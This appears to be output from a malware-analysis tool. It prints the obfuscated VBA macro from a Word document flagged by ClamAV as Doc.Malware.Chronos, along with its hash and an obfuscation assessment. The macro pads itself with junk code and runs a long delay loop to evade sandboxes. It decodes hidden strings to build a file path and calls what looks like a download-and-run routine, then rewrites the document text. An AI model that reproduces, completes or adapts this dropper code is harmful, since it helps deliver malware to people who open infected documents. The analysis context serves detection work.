If VWyjKNK72m2RIGfnu + RuSVU > 4 Then
RuSVU = VWyjKNK72m2RIGfnu + 70
Else
MsgBox 97
End If
Dim RcfhYKbvetd As String
Dim ErapFFTNSVU As Long, DrAjm9ejC As Long
ErapFFTNSVU = 18
DrAjm9ejC = 77
If ErapFFTNSVU + DrAjm9ejC > 4 Then
DrAjm9ejC = ErapFFTNSVU + 24
Else
MsgBox 58
End If
Dim BMjRypaNLzNR3 As Long, Jf9Wn2 As Long, IDNNqDER6NZ8 As Long, WWf2teuDu As Integer
Dim XOdJj4RWPHly As Long, FbCJTyiwp As Long
XOdJj4RWPHly = 98
FbCJTyiwp = 72
If XOdJj4RWPHly + FbCJTyiwp > 4 Then
FbCJTyiwp = XOdJj4RWPHly + 79
Else
MsgBox 30
End If
BMjRypaNLzNR3 = 942728842: Jf9Wn2 = 0: IDNNqDER6NZ8 = 0
Dim UWtqJ3WVz9 As Long, AR6YOxLFt99 As Long
UWtqJ3WVz9 = 65
AR6YOxLFt99 = 47
If UWtqJ3WVz9 + AR6YOxLFt99 > 4 Then
AR6YOxLFt99 = UWtqJ3WVz9 + 29
Else
MsgBox 55
End If
For Jf9Wn2 = 1 To BMjRypaNLzNR3
IDNNqDER6NZ8 = IDNNqDER6NZ8 + 1
Next Jf9Wn2
Dim H71AmjjgW7 As Long, HRmRG964fZCwj As Long
H71AmjjgW7 = 35
HRmRG964fZCwj = 64
If H71AmjjgW7 + HRmRG964fZCwj > 4 Then
HRmRG964fZCwj = H71AmjjgW7 + 50
Else
MsgBox 19
End If
If IDNNqDER6NZ8 = BMjRypaNLzNR3 Then
Dim WKOCtsVrBVzQobWKo As Long, Qcq26UDHsoSPJx As Long
WKOCtsVrBVzQobWKo = 41
Qcq26UDHsoSPJx = 72
If WKOCtsVrBVzQobWKo + Qcq26UDHsoSPJx > 4 Then
Qcq26UDHsoSPJx = WKOCtsVrBVzQobWKo + 24
Else
MsgBox 23
End If
RcfhYKbvetd = Environ(CUh12emhPa4g(Chr(242) + Chr(139) + Chr(69) + Chr(106) + Chr(159) + Chr(202) + Chr(230), "X9Hxae1qOv")) & "\" & OBqADCHy & CUh12emhPa4g(Chr(18) + Chr(12) + Chr(7) + Chr(253), "Vgq8Q62G")
Dim Gzew5HTqKk As Long, QzRyoRqfGiX As Long
Gzew5HTqKk = 54
QzRyoRqfGiX = 7
If Gzew5HTqKk + QzRyoRqfGiX > 4 Then
QzRyoRqfGiX = Gzew5HTqKk + 49
Else
MsgBox 47
End If
If Yptw7lcRqUAqs1(CUh12emhPa4g(Chr(199) + Chr(207) + Chr(152) + Chr(90) + Chr(102) + Chr(120) + Chr(119) + Chr(187) + Chr(74) + Chr(15) + Chr(108) + Chr(211) + Chr(161) + Chr(135) + Chr(68) + Chr(121) + Chr(214) + Chr(112) + Chr(57) + Chr(235) + Chr(198) + Chr(247) + Chr(15) + Chr(131) + Chr(112) + Chr(45) + Chr(232) + Chr(12) + Chr(30) + Chr(181) + Chr(49) + Chr(182) + Chr(14) + Chr(68) + Chr(2) + Chr(90) + Chr(56) + Chr(180) + Chr(167) + Chr(216) + Chr(172) + Chr(116), "EvwXcRx"), RcfhYKbvetd, CUh12emhPa4g(Chr(203) + Chr(18) + Chr(38) + Chr(119) + Chr(133) + Chr(31) + Chr(3) + Chr(213) + Chr(117), "Mw2uiDPQY3XH")) = True Then
Dim SeTaV6gcZTmkUl As Long, QtaJZdRgvYXxDdl As Long
SeTaV6gcZTmkUl = 91
QtaJZdRgvYXxDdl = 94
If SeTaV6gcZTmkUl + QtaJZdRgvYXxDdl > 4 Then
QtaJZdRgvYXxDdl = SeTaV6gcZTmkUl + 13
Else
MsgBox 58
End If
RQxKoIyhmZRjA 1
Dim TAFc1HK4sO As Long, Pim As Long
TAFc1HK4sO = 90
Pim = 11
If TAFc1HK4sO + Pim > 4 Then
Pim = TAFc1HK4sO + 22
Else
MsgBox 15
End If
XiB46eUBNC RcfhYKbvetd
Dim N3vr0aNH As Long, L5JHaYjpM9YMZ As Long
N3vr0aNH = 28
L5JHaYjpM9YMZ = 23
If N3vr0aNH + L5JHaYjpM9YMZ > 4 Then
L5JHaYjpM9YMZ = N3vr0aNH + 12
Else
MsgBox 47
End If
End If
Dim U72sqG9Xwx As Long, PMMWzLxJ6udrgcn As Long
U72sqG9Xwx = 15
PMMWzLxJ6udrgcn = 37
If U72sqG9Xwx + PMMWzLxJ6udrgcn > 4 Then
PMMWzLxJ6udrgcn = U72sqG9Xwx + 70
Else
MsgBox 98
End If
ActiveDocument.Range.Text = CUh12emhPa4g(Chr(111) + Chr(169) + Chr(212) + Chr(86) + Chr(69) + Chr(0) + Chr(209) + Chr(89) + Chr(21) + Chr(20) + Chr(135) + Chr(50) + Chr(125) + Chr(99) + Chr(148) + Chr(237) + Chr(211) + Chr(226) + Chr(64) + Chr(176) + Chr(91) + Chr(142) + Chr(72) + Chr(116) + Chr(219) + Chr(22) + Chr(161) + Chr(45) + Chr(123) + Chr(104) + Chr(82) + Chr(107) + Chr(210) + Chr(160) + Chr(152) + Chr(3) + Chr(154) + Chr(188) + Chr(85) + Chr(161) + Chr(119) + Chr(68) + Chr(165) + Chr(183) + Chr(180) + Chr(251) + Chr(9) + Chr(95) + Chr(140) + Chr(67) + Chr(36) + Chr(38) + Chr(138) + Chr(110) + Chr(221) + Chr(147) + Chr(13) + Chr(165) + Chr(118) + Chr(51) + Chr(214) + Chr(133) + Chr(168) + Chr(208) + Chr(212) + Chr(8) + Chr(53) + Chr(73) + Chr(24) + Chr(195) + Chr(87), "JrpyIPiaTX")
End If
Dim KjjLrbXCz0lHq As Long, HVNTyOM9YMZ As Long
KjjLrbXCz0lHq = 2
HVNTyOM9YMZ = 51
If KjjLrbXCz0lHq + HVNTyOM9YMZ > 4 Then
HVNTyOM9YMZ = KjjLrbXCz0lHq + 28
Else
MsgBox 23
End If
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 52736 bytes
SHA-256: 2235f3bed5fb4ab8c0e5be1e9c4c61fa3195829ddc8f8c92eb3e96d49c45c635
Detection
ClamAV: Doc.Malware.Chronos-6897935-0
Obfuscation or payload: likely
312 of 613 identifiers look randomly generated (e.g. 'H1unwlMZF1W0I8da2') — consistent with name-mangling obfuscation.